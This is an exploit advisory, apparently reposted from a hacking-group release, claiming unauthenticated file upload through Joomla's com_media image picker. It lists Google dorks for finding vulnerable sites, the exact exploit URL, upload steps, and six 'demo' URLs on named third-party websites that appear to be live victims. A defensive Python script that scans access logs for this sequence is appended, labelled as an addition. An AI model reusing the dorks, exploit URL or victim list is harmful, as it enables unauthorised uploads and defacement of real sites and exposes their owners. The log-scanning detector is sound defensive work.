Joomla com_media Upload Vulnerability

2017.02.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#######################################################
##################{In The Name Of God}#################
#######################################################

############################################
# Exploit Title: Joomla Media Upload Vulnerability
# Date: 2017 | 18 | February
# Author: Ashiyane Digital Security Team
# Vendor Homepage : https://www.joomla.org
# Version: All Version
# Tested On : Windows 8 / Chrome
############################################

########
# Google Dork 1 : inurl:/component/media/
# Google Dork 2 : inurl:/index.php/component/media/
########

########
# exploit => /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
#
# then => http://www.site.com/[path]/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
#
# select => Select the "Upload file" > Choose Files And : Uploaded File URL: site.com/images/[filename]
#
# ( We Can Upload Files With These Formats : txt - jpg - png - gif )
#
# after file upload you are able to see the file in the path => http://site.com/[path]
#
########

########
# Demo 1 : http://www.personcentredplanning.eu/index.php/component/media/?view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author=
#
# Demo 2 : http://www.restaurantportocolom.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
#
# Demo 3 : http://europeanaffairs.org/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
#
# Demo 4 : http://www.reach.org.sg/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
#
# Demo 5 : http://www.mansfield.org/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
#
# Demo 6 : http://www.stepstograce.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
########

[+][+][+][+][+][+][+][+][+][+][+][+]
Discovered By : Cyber.Defacer
[+][+][+][+][+][+][+][+][+][+][+][+]

*=============================================================|
| Special Thanks To : Behrooz_Ice, Virangar, H_SQLI.EMpiRe, Ehsan Cod3r,
| Und3rgr0und, Amir.ght, xenotix, modiret, V For Vendetta, Alireza, micle,
| r4ouf, Net Hacker, Spoofer, alcol, 1TED, H4554N, shahroukh, Saeid_9n,
| F.SQLi, Muts, HackFans, B14CK SPID3R, MALWaRE43, moh3nra021, Sha4yan, M.R.S.L.Y
| And All Of My Friends ...
*=============================================================|
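As an added defensive example (not part of the advisory or of Joomla), the check below scans web-server access logs for the two com_media URL forms quoted above and flags addresses that reached the picker with a 2xx and then fetched a .txt/.jpg/.png/.gif from /images/, the sequence the advisory describes. The log lines are constructed, and treating the upload itself as a POST back to com_media is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-log sample (not from any real server); lines 1-3
# replay the open-picker / upload / fetch sequence from the advisory.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Feb/2017:10:01:02 +0000] "GET /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Feb/2017:10:01:09 +0000] "POST /index.php?option=com_media&task=file.upload&tmpl=component HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Feb/2017:10:01:15 +0000] "GET /images/note.txt HTTP/1.1" 200 44 "-" "Mozilla/5.0"
198.51.100.2 - - [18/Feb/2017:10:02:00 +0000] "GET /index.php/component/media/?view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author= HTTP/1.1" 403 512 "-" "Mozilla/5.0"
198.51.100.9 - - [18/Feb/2017:10:02:30 +0000] "GET /images/logo.png HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
UPLOAD_EXTS = ('.txt', '.jpg', '.png', '.gif')   # types the advisory says are accepted

def classify(line):
    """(ip, status, event) with event in {'media_view','media_post','images_fetch',None}."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m['target'])
    qs = parse_qs(url.query)
    # Both URL forms shown in the advisory: ?option=com_media and the SEF /component/media/ route.
    is_media = qs.get('option') == ['com_media'] or url.path.startswith('/index.php/component/media')
    event = None
    if is_media and m['method'] == 'POST':
        event = 'media_post'     # assumption: the upload itself is a POST back to com_media
    elif is_media and qs.get('view') == ['images'] and qs.get('tmpl') == ['component']:
        event = 'media_view'     # the stand-alone picker URL quoted in the advisory
    elif url.path.startswith('/images/') and url.path.lower().endswith(UPLOAD_EXTS):
        event = 'images_fetch'   # the advisory says uploads are served from /images/
    return m['ip'], int(m['status']), event

def suspicious_ips(log_text):
    """Addresses that reached the picker/upload (2xx) and later fetched an upload-type file from /images/."""
    reached = defaultdict(set)
    flagged = set()
    for line in log_text.splitlines():
        rec = classify(line)
        if rec is None:
            continue
        ip, status, event = rec
        if event in ('media_view', 'media_post') and 200 <= status < 300:
            reached[ip].add(event)
        elif event == 'images_fetch' and reached[ip]:
            flagged.add(ip)
    return flagged
```

Calling `suspicious_ips(SAMPLE_LOG)` returns `{'203.0.113.7'}`; the 403 on the SEF route and the unrelated logo fetch are not flagged.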


Copyright 2018, cxsecurity.com